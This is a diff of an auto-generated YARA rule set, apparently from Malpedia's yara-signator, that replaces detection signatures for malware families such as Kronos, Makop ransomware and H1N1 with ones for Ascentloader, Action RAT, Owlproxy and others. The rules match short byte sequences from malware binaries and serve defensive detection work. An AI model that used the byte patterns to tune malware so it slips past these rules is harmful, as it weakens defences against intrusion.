-		$sequence_8 = { 3bd8 7e2c 8d95b0feffff 8d8d60faffff e8???????? 8b9da8faffff 8bf8 }
-		$sequence_9 = { 33c0 66898625030000 89862a030000 888627030000 888622030000 884660 88467c }
+		$sequence_0 = { 4f 42 3b7d10 724d }
+		$sequence_1 = { 8b4d08 03481c 894de4 8b55f4 8b45e4 }
+		$sequence_2 = { 33ce 314de8 890a 894de4 }
+		$sequence_3 = { 7402 eb60 8b45fc 83c078 8945f0 8b4df0 }
+		$sequence_4 = { 85c0 741f 8b4df8 c1e90d 8b55f8 c1e213 0bca }
+		$sequence_5 = { 41 8801 41 e9???????? 6afc 2b4d10 8b5514 }
+		$sequence_6 = { 0f82a4000000 83fe06 0f822cffffff 8bc1 }
+		$sequence_7 = { 33ce 33d1 33da 8970f0 }
+		$sequence_8 = { 51 e8???????? 0fb7d0 0355f8 }
+		$sequence_9 = { 0bca 894df8 8b45fc 0fb708 51 e8???????? }
+		$sequence_10 = { 33c1 03c0 33c8 8bc1 c1e808 }
+		$sequence_11 = { 8945fc 8b4d0c 8b55fc 3b5118 }
+		$sequence_12 = { 2bc2 83f801 0f8208010000 803a00 }
+		$sequence_13 = { 4f 42 42 eb56 }
+		$sequence_14 = { 8b5508 031481 8955f4 8b45f4 50 e8???????? }
+		$sequence_15 = { f7d2 8b45f4 335004 8955f8 8b4df4 }
 
 	condition:
-		7 of them and filesize < 1063936
+		7 of them and filesize < 1205248
 }
-rule MALPEDIA_Win_Kronos_Auto : FILE
+rule MALPEDIA_Win_Ascentloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "926e3174-18bd-5768-8bad-aee020442946"
+		id = "4372eef6-4656-5e4d-b175-471d65d2d6f2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kronos_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ascentloader_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "37c4a3cedbb07e112b6f5ea1747119314006e52be9a57885219c4b994f74b249"
+		logic_hash = "3968524e74d1c6dce6af2edd09bc8b40e402c007d240f6b355af76ae453cb02a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135036,32 +134762,32 @@ rule MALPEDIA_Win_Kronos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 8bca e8???????? 8b4510 015f0c 8b4f0c 33d2 }
-		$sequence_1 = { 8b4508 8b4d10 5f 5b c70000000000 }
-		$sequence_2 = { e8???????? 83450810 83451010 ff4d0c 837d0c00 7fe2 }
-		$sequence_3 = { 8955f4 8975f8 bfff000000 3935???????? 754a c705????????01000000 53 }
-		$sequence_4 = { 83c40c 837dfc02 724b 8b55f4 83c208 52 8d4de0 }
-		$sequence_5 = { 57 56 56 8d8da0efffff }
-		$sequence_6 = { 8945c8 3bc6 0f8406020000 bfd8010000 57 e8???????? }
-		$sequence_7 = { 53 ff15???????? 8b442418 5f 5e 5b 8be5 }
-		$sequence_8 = { 50 8d45e8 50 ffd2 8b4804 8b7008 }
-		$sequence_9 = { b84d5a0000 663901 0f857f010000 8b413c 03c1 813850450000 0f856e010000 }
+		$sequence_0 = { b8???????? eb0a b900240000 b8???????? }
+		$sequence_1 = { 8b4df4 e8???????? 57 ff15???????? ff15???????? }
+		$sequence_2 = { 8bf8 897dd8 85ff 7516 83c8ff e9???????? c745e440ac4100 }
+		$sequence_3 = { 740b 8b55e8 8b4dfc e8???????? 8b4dfc }
+		$sequence_4 = { 8955fc 83b88400000000 0f86ea000000 56 8bb080000000 }
+		$sequence_5 = { c744243a62756700 ff15???????? 8b35???????? ffd6 }
+		$sequence_6 = { 57 68000000f0 6a01 33db 894de8 53 }
+		$sequence_7 = { 3b4814 7604 33c0 eb14 8b45fc 8b4df8 03481c }
+		$sequence_8 = { e8???????? 8b4d10 8bd0 8b4514 }
+		$sequence_9 = { 005caa40 0023 d18a0688078a 46 }
 
 	condition:
-		7 of them and filesize < 1302528
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Nemim_Auto : FILE
+rule MALPEDIA_Win_Action_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2fcca9e2-b8f3-5d83-84fc-b2e40aa4f4f9"
+		id = "0abe3565-6584-5599-b7de-461d5c2244c8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nemim_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.action_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.action_rat_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "24d9011f0ff0bebf263a930abe315373fb7838840fe9989752df0056ff714df5"
+		logic_hash = "5ed778484db64ab13a477929c07da39230f4ad04ded616573b48c243aaef2b6f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135075,32 +134801,32 @@ rule MALPEDIA_Win_Nemim_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c002 53 55 56 57 8d742410 bf10000000 }
-		$sequence_1 = { 52 6801000080 ff15???????? 8d442418 8d4c2454 50 8b442418 }
-		$sequence_2 = { 56 ff15???????? 8b442410 3d97010000 0f84ae000000 6800040000 }
-		$sequence_3 = { 888424e7000000 e8???????? 83c404 8d9424b4000000 68???????? 6819000200 6a00 }
-		$sequence_4 = { 8bd1 8dbc2450020000 c1e902 f3ab 8bca }
-		$sequence_5 = { 52 e8???????? 8d442458 50 e8???????? 8b15???????? 8d4c245c }
-		$sequence_6 = { 8b6c2440 8dbc3839d0d4d9 8bc7 c1e81c c1e704 0bc7 8bfe }
-		$sequence_7 = { 8bf0 750b c1e602 8b8628274300 eb09 c1e602 }
-		$sequence_8 = { 83fe10 7cde c605????????00 b90b000000 be???????? 8dbc2410010000 }
-		$sequence_9 = { 68e8030000 e8???????? 83c404 85f6 }
+		$sequence_0 = { 8b10 8955ec 8b45ec 3b45f0 7707 e8???????? eb3c }
+		$sequence_1 = { 894d9c c645fc00 8d4db0 e8???????? c745fcffffffff 8d4d18 e8???????? }
+		$sequence_2 = { 8b4df8 c1e104 81c1???????? e8???????? 8b55f8 c1e204 038298f80210 }
+		$sequence_3 = { 51 ff15???????? 83c404 85c0 7412 0fbe5508 83ea30 }
+		$sequence_4 = { 8b55f4 837a1800 7420 0fb645fb 50 8b4df4 8b4918 }
+		$sequence_5 = { e8???????? 83c408 8d450c 50 8b4dec 83c104 51 }
+		$sequence_6 = { d1e8 8945ec 8b4dec 034dc8 894de0 8b55f8 }
+		$sequence_7 = { 8d4dec 51 8b4d08 e8???????? 50 8d55d0 }
+		$sequence_8 = { 7702 eb02 eb9f 6a00 8b4dd4 51 8d4dd8 }
+		$sequence_9 = { 8d4dd8 e8???????? 50 e8???????? 83c414 8945d4 8d4dd8 }
 
 	condition:
-		7 of them and filesize < 499712
+		7 of them and filesize < 480256
 }
-rule MALPEDIA_Elf_Nosedive_Auto : FILE
+rule MALPEDIA_Win_Nautilus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0896063d-4b04-5de6-a33c-b1437bc56c3d"
+		id = "77d46a5b-ac0a-5fed-b7dc-730469f1a198"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.nosedive"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.nosedive_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nautilus_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "8416103e0574bbf55ec9fa82bbc72a32d4b6a677477fed1dee3caabd7071b0d2"
+		logic_hash = "75449a89b7fb4754deadb905e528b81ef0ad7c932b9a665933340397cfc77449"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135114,32 +134840,32 @@ rule MALPEDIA_Elf_Nosedive_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8b06 488b7c2408 4589ed 8907 428b442efc 4289442ffc }
-		$sequence_1 = { c644240800 8b7b10 31c9 488db42404010000 4989e4 ba02000000 e8???????? }
-		$sequence_2 = { ebe9 4531f6 4531ff 488b6c2410 4c397320 7630 488b4318 }
-		$sequence_3 = { e8???????? 5f b8008fffff 4158 e9???????? 4c8d05117f0f00 b974090000 }
-		$sequence_4 = { eb17 4889de 4889ef e8???????? 48895d10 48895d18 4c897520 }
-		$sequence_5 = { b93f000000 4429f9 4585c9 7527 4139ca 7d27 418d4f01 }
-		$sequence_6 = { f348ab 49837e6000 4d896e70 49895e78 751e b810000000 4983ff14 }
-		$sequence_7 = { c3 83c8ff 48397e08 7543 8b07 4c634610 2500010000 }
-		$sequence_8 = { e8???????? 8b4c243c ffc0 7516 48c7c098ffffff 6483385a 0f85e8010000 }
-		$sequence_9 = { e9???????? 48ffc0 80fa3a 7408 8a10 84d2 75f2 }
+		$sequence_0 = { e8???????? eb0b 0f28ce 488bcb e8???????? 660f2efe 7a02 }
+		$sequence_1 = { e8???????? 410fb7445c0a 498bce 0fb61406 448b0487 e8???????? 410fb7445c0c }
+		$sequence_2 = { e9???????? 413bfc 0f84c7000000 41be20000000 eb09 413bfc 0f84b6000000 }
+		$sequence_3 = { f20f5ccd eb08 f20f59ce f20f58ce 4885d2 7407 0f570d???????? }
+		$sequence_4 = { eb19 443bc3 7f14 c1e917 4103c8 3bd9 7f0a }
+		$sequence_5 = { 85c0 751b 488d4b18 8d5001 e8???????? 85c0 750b }
+		$sequence_6 = { 7459 41ffca 740a b800bfffff 4883c458 c3 488b842498000000 }
+		$sequence_7 = { 7520 488d7eff 488d55b0 488d4dc8 4885ff 756b e8???????? }
+		$sequence_8 = { 83f815 0f842b010000 83f816 74ba 83f817 745e 7e3c }
+		$sequence_9 = { 7424 bafeffff7f 33c9 e8???????? 8bcb 8bd0 488b4730 }
 
 	condition:
-		7 of them and filesize < 3268608
+		7 of them and filesize < 1302528
 }
-rule MALPEDIA_Win_Rekoobew_Auto : FILE
+rule MALPEDIA_Win_Owlproxy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c4672783-76e3-563a-8027-eca1db960fbe"
+		id = "63e3635a-b438-5b14-b4eb-af7ffdbef122"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rekoobew_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.owlproxy_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "58559e9eb7cf00c4472271b9f2f8096ac74daa9182ac5f503ca473672c8d4ebd"
+		logic_hash = "53d3a09278d24d3abda5835aa7f0dd4ef8496154e71ad2a30bd173f4868edb33"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135153,71 +134879,71 @@ rule MALPEDIA_Win_Rekoobew_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b75bc 3375c4 3375d8 3375ec }
-		$sequence_1 = { 0fb6fe 89ca 3314bde08c4000 0fb6f2 8b3cb5e0904000 }
-		$sequence_2 = { 894714 83c201 83fa08 7588 }
-		$sequence_3 = { 33348de0704000 8b4de8 c1e910 0fb6c9 33348de0744000 8975e0 }
-		$sequence_4 = { 3c0d 745e 80f93d 0f85a0feffff 89f0 eb53 b8ffffffff }
-		$sequence_5 = { 894de0 0fb67004 c1e618 0fb65005 c1e210 09f2 0fb67007 }
-		$sequence_6 = { 0f84c5000000 8b5078 85d2 0f84ba000000 8b35???????? 85f6 }
-		$sequence_7 = { 33735c 89d7 c1ef18 3334bde0844000 89cf c1ef10 81e7ff000000 }
-		$sequence_8 = { 09d7 0fb64827 09cf 0fb65026 c1e208 09d7 897dc8 }
-		$sequence_9 = { e8???????? 85c0 7916 c704240f000000 e8???????? b828000000 e9???????? }
+		$sequence_0 = { 488b4908 410fb7f0 488bfa 4c8d442450 488d542458 c744245014000000 ff15???????? }
+		$sequence_1 = { 486bc000 488d0d42330200 8b542430 48891401 488d0d0b810100 e8???????? }
+		$sequence_2 = { 55 57 4156 488da808feffff 4881ece0020000 48c7442478feffffff 48895818 }
+		$sequence_3 = { e8???????? 4c8b742440 4c3b742448 7435 }
+		$sequence_4 = { 2bf3 448bc6 488bd3 488d8c2430010000 e8???????? 448b8424f8000000 }
+		$sequence_5 = { 498936 49895e08 49897e10 4883bd8800000010 7209 488b4d70 e8???????? }
+		$sequence_6 = { 415e 415d 415c 5f c3 488d0d2c290200 e8???????? }
+		$sequence_7 = { 480f4355b8 4533c0 488b4da8 ff15???????? 895db0 4c8d25f53c0200 }
+		$sequence_8 = { 4883ec20 488d0d53580100 ff15???????? 488d1566580100 488bc8 488bd8 ff15???????? }
+		$sequence_9 = { 4885db 0f8480000000 410fb60437 8803 eb77 483bdf 756a }
 
 	condition:
-		7 of them and filesize < 248832
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Makop_Ransomware_Auto : FILE
+rule MALPEDIA_Win_Scanline_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cd34e745-9497-5ffc-bd73-ecb5996e2067"
-		date = "2023-07-11"
-		modified = "2023-07-15"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.makop_ransomware_auto.yar#L1-L124"
+		id = "0a94c58f-9a04-5a8f-a52b-c8922aabd872"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanline"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scanline_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "3c7cc3419f322a8e9eb8473ecaf54fc5da0725e8a0f35ff3f90245e28389848b"
+		logic_hash = "ae2af87b82d9394b37c14ff046f7786f58d075866fa464adcdf96cb76e14a4ba"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20230705"
-		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
-		malpedia_version = "20230715"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb02 33f6 803d????????00 751f 803d????????00 7516 80fb01 }
-		$sequence_1 = { 52 50 51 e8???????? 8b542430 83c40c 68e0930400 }
-		$sequence_2 = { 52 66c7060802 66c746041066 c6460820 }
-		$sequence_3 = { 56 ff15???????? 85c0 750b 8906 32c0 5e }
-		$sequence_4 = { 83c001 84c9 75f7 2bc7 83e801 39442404 720a }
-		$sequence_5 = { ffd6 85ff 740f 85db 740b 837c242000 7404 }
-		$sequence_6 = { 8b2d???????? 3beb 742e 8b4524 3bc3 7407 50 }
-		$sequence_7 = { 7416 e8???????? 6a00 e8???????? 83c404 }
-		$sequence_8 = { e8???????? 8b442418 83c40c 8b4f0c }
-		$sequence_9 = { 742f 33c0 3906 763d 8d4c2448 }
+		$sequence_0 = { 7404 8b400c c3 33c0 c3 83611000 c3 }
+		$sequence_1 = { 740e 53 8bc8 ff742414 e8???????? eb02 }
+		$sequence_2 = { 8bd8 85db 743d 6800040000 8d4608 ff7508 }
+		$sequence_3 = { 7434 6a10 e8???????? 3bc3 59 740e 53 }
+		$sequence_4 = { 750f 83f81f 730a 885c0438 8a1f 40 }
+		$sequence_5 = { 7e10 894608 c1e003 50 e8???????? 59 894604 }
+		$sequence_6 = { 59 59 8b45fc a3???????? e9???????? c705????????01000000 e9???????? }
+		$sequence_7 = { 8bc8 c1e103 8bd1 89460c 33c0 c1e902 }
+		$sequence_8 = { 51 bbffff0000 6806100000 53 50 ffd7 8d8608050000 }
+		$sequence_9 = { 8b4e18 50 e8???????? 6a24 e8???????? 8bf8 59 }
 
 	condition:
-		7 of them and filesize < 107520
+		7 of them and filesize < 151552
 }
-rule MALPEDIA_Win_H1N1_Auto : FILE
+rule MALPEDIA_Win_Jripbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "37ad4a5e-e020-5ff8-9301-408e3e0a9d4d"
+		id = "6dca0814-ee58-53a7-824c-c626a6b40b02"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.h1n1_auto.yar#L1-L176"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jripbot_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "2e33215c731e3a160279240713f0099872fd50afe0eb8ebfd851884e2b2c7ed5"
+		logic_hash = "177d4eed69a2789f1363a5a38a7b17a6a4de0acf1062d48112f06f3ff8f9a1ab"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135231,38 +134957,32 @@ rule MALPEDIA_Win_H1N1_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { bb09000000 eb6c 83bde8feffff0a 7563 }
-		$sequence_1 = { 51 8b7df4 b900100000 33c0 f3aa 59 }
-		$sequence_2 = { c745cc01000000 c745d010000000 c745d402000000 c745d820000000 c745dc04000000 c745e040000000 }
-		$sequence_3 = { ff05???????? 6800020000 ff35???????? 58 }
-		$sequence_4 = { 3503003400 ab 2d0e00fcff ab }
-		$sequence_5 = { ffd0 ff750c ff75f0 ff75f4 8d45b8 50 e8???????? }
-		$sequence_6 = { c745e404000000 c745e840000000 0fb77b06 8db3f8000000 33c9 f7462400000020 7403 }
-		$sequence_7 = { ff75f8 ff7508 ff75fc ff75f4 ff35???????? 58 ffd0 }
-		$sequence_8 = { 25ff000000 c1e908 330c85908f0010 42 }
-		$sequence_9 = { 8bc1 83e001 d1e9 330c8500850010 330c95f48b0010 42 890c95bc850010 }
-		$sequence_10 = { 8b442404 33d2 a3???????? 42 b9c0850010 8b01 c1e81e }
-		$sequence_11 = { 50 68fc600010 6804010000 ff7508 e8???????? 83c424 c9 }
-		$sequence_12 = { 81ff7c8f0010 7cd4 5f 8b0d???????? 330d???????? }
-		$sequence_13 = { d1e9 330c8500850010 330d???????? 890d???????? 8b0cb5c0850010 8bc1 c1e80b }
-		$sequence_14 = { 33f6 53 8bd6 bbffffff7f 8b0c95c4850010 330c95c0850010 23cb }
-		$sequence_15 = { 68f4600010 56 e8???????? 8bf0 59 }
+		$sequence_0 = { 52 51 50 0fbf45ee 50 be???????? e8???????? }
+		$sequence_1 = { 50 ff15???????? eb61 ff742434 8d842464010000 ff742414 e8???????? }
+		$sequence_2 = { 7436 830804 f6c302 742e 56 ff15???????? 50 }
+		$sequence_3 = { 8d85a8fcffff 8d5001 8a08 40 3acb 75f9 2bc2 }
+		$sequence_4 = { 50 8d442418 50 894c2420 ff15???????? 83c40c 85c0 }
+		$sequence_5 = { 6a30 ff750c 8d75fc 8bcf e8???????? 83c408 }
+		$sequence_6 = { 8b8de0fdffff 8bc3 668b10 663b11 751e 663bd7 7415 }
+		$sequence_7 = { 33fb 037dfc 8b5ddc 235df4 0bf3 03f7 8b7d88 }
+		$sequence_8 = { 8bf8 83c40c 85ff 0f85da000000 ff742410 8d442448 e8???????? }
+		$sequence_9 = { 8d443718 50 e8???????? 83c40c 8d4618 8bce e8???????? }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 507904
 }
-rule MALPEDIA_Win_Huskloader_Auto : FILE
+rule MALPEDIA_Win_Nim_Blackout_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "baa8dc28-4bde-5660-bacb-e311987b66fe"
+		id = "52c7d5e9-12a7-539a-90b8-852642880eb0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.huskloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.huskloader_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nim_blackout"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nim_blackout_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "efaf6361c8e2a990c1d94ea51b671a22e525594bb6c413d70cb1d93190351b34"
+		logic_hash = "6c5cae00e9c851f788aea7ba4107707f8738f1e8e9b098f9929e9947fb70cddd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135276,32 +134996,32 @@ rule MALPEDIA_Win_Huskloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d7f08 8b048d04330010 ffe0 f7c703000000 7413 8a06 }
-		$sequence_1 = { 894db0 8b048de88d0110 8975b4 8b440618 8b7514 }
-		$sequence_2 = { 6a00 6aff 66c7861a0600000111 ff15???????? 85c0 7430 682d060000 }
-		$sequence_3 = { 7712 0fb7c1 0faee8 0fb688181c0110 83e10f eb02 }
-		$sequence_4 = { e8???????? c70016000000 e8???????? 5d c20400 53 56 }
-		$sequence_5 = { 8904bde88d0110 85c0 7514 6a0c 5e 8975e4 c745fcfeffffff }
-		$sequence_6 = { 8db708020000 56 ff15???????? 56 ff15???????? 68???????? }
-		$sequence_7 = { 682d060000 6a00 6a04 6a00 6aff ff15???????? 85c0 }
-		$sequence_8 = { 5e 5d c3 e8???????? 85c0 0f8442310000 c3 }
-		$sequence_9 = { 7551 e8???????? c70021000000 eb44 c745e002000000 c745e4c45e0110 }
+		$sequence_0 = { 55 4889e5 4883ec30 48894d10 488b05???????? 4885c0 750d }
+		$sequence_1 = { 488b00 eb05 b800000000 483b85a8000000 7f30 4883bdf800000000 }
+		$sequence_2 = { 48c745c0c0000000 488d05ad7e0100 488945c8 488b45f0 488945f8 eb40 90 }
+		$sequence_3 = { 48c1e003 4801d0 488b00 4885c0 741a 488b4510 488b5008 }
+		$sequence_4 = { 488905???????? 488b05???????? 4885c0 750c 488d0d229c0100 e8???????? 488b05???????? }
+		$sequence_5 = { 488b45f8 488905???????? eb01 90 e8???????? 90 4883c460 }
+		$sequence_6 = { 488d05dd770100 488945e8 488b4510 488b00 ba08000000 4889c1 e8???????? }
+		$sequence_7 = { 488945f8 48c745d07b000000 488d05d02a0200 488945d8 488b45f8 488d14c500000000 488b4518 }
+		$sequence_8 = { 488d05ed680100 48894558 ba00000000 488b85b8000000 4883c001 7105 ba01000000 }
+		$sequence_9 = { 488d05d2af0200 488945e8 488b5510 488b05???????? 488d4818 e8???????? e8???????? }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 1068032
 }
-rule MALPEDIA_Win_Wm_Rat_Auto : FILE
+rule MALPEDIA_Win_Badencript_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c6756856-697a-5678-ac68-3f5e48855d20"
+		id = "ddb7f1a7-8259-5ec8-9b35-e98fb67b2310"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wm_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wm_rat_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.badencript_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "17d23eab1cdfe83be57cb83b91146c56a89d3518780617b00510aa5e646a5ec0"
+		logic_hash = "4aaa48768d97770f6e85ee594f356b88c6dabd160111a6a927596e69e9ca03f4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135315,32 +135035,32 @@ rule MALPEDIA_Win_Wm_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89481c 894820 894824 6a00 b901000000 6a00 6689480c }
-		$sequence_1 = { 8d8c24e4110000 ff15???????? c684247c31020056 8b8424d4110000 8b4804 f6840cdc11000006 0f842c010000 }
-		$sequence_2 = { 83f8ff 0f8423070000 90 f684247402000010 0f8492020000 68fc070000 8d8c24f80b0000 }
-		$sequence_3 = { ff15???????? 33c9 6a30 51 8d9424aa100000 }
-		$sequence_4 = { 8b4c240c 6aff 8d542414 894608 }
-		$sequence_5 = { 83c404 6a64 ffd6 8b4c2414 51 e8???????? 83c404 }
-		$sequence_6 = { b804000000 2bc6 50 8d0c3e 51 52 }
-		$sequence_7 = { 50 8b4204 ffd0 c684245402000000 8b44241c 83c0f0 8d480c }
-		$sequence_8 = { 84c0 0f84f4e9ffff 83ec1c 8bcc 89642434 68???????? ff15???????? }
-		$sequence_9 = { 3b01 743b 8b542428 8b4e14 2bd0 8d4c0a01 51 }
+		$sequence_0 = { 23c1 eb55 8b1c9d68d14000 56 6800080000 }
+		$sequence_1 = { 8b0c8d48414100 c644112800 85f6 740c }
+		$sequence_2 = { 660fd60f 8d7f08 8b048d04b54000 ffe0 }
+		$sequence_3 = { 57 8d1c85383d4100 33c0 f00fb10b 8b15???????? 83cfff }
+		$sequence_4 = { 7451 83e809 7443 83e801 0f8501010000 c745e0a40f4100 }
+		$sequence_5 = { 660fd60f 8d7f08 8b048d04b54000 ffe0 f7c703000000 7413 }
+		$sequence_6 = { c1fa06 6bc830 8b049548414100 f644082801 7414 8d4508 8945fc }
+		$sequence_7 = { 6bc830 8b049548414100 f644082801 7421 57 e8???????? }
+		$sequence_8 = { 83e03f c1fa06 6bc830 8b049548414100 f644082801 7414 }
+		$sequence_9 = { 7313 8a8750304100 08441619 42 }
 
 	condition:
-		7 of them and filesize < 258048
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Cabart_Auto : FILE
+rule MALPEDIA_Win_Photoloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f125e8a4-ec32-5390-8552-f2a98b622d63"
+		id = "8e57491c-6cec-54b0-9e33-36f4eaa437c4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cabart_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.photoloader_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "61ecd8ce7a25b1013cbbef59f59ac25a4742d00a8fbf8c91414650d5dc932d94"
+		logic_hash = "2f15d6b5866c53e3831e42ccf3580d949b52efae89debdf96aad0057ebcc65ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135354,32 +135074,39 @@ rule MALPEDIA_Win_Cabart_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 be04010000 8d85d8fbffff 56 }
-		$sequence_1 = { 5f 40 5e c9 c21000 53 }
-		$sequence_2 = { 55 a3???????? ffd6 68???????? ff742414 a3???????? ffd6 }
-		$sequence_3 = { 395d10 740f 6800800000 53 ff7510 }
-		$sequence_4 = { ff15???????? ff15???????? 57 3db7000000 }
-		$sequence_5 = { 761e 8b450c 8930 8b4510 eb16 }
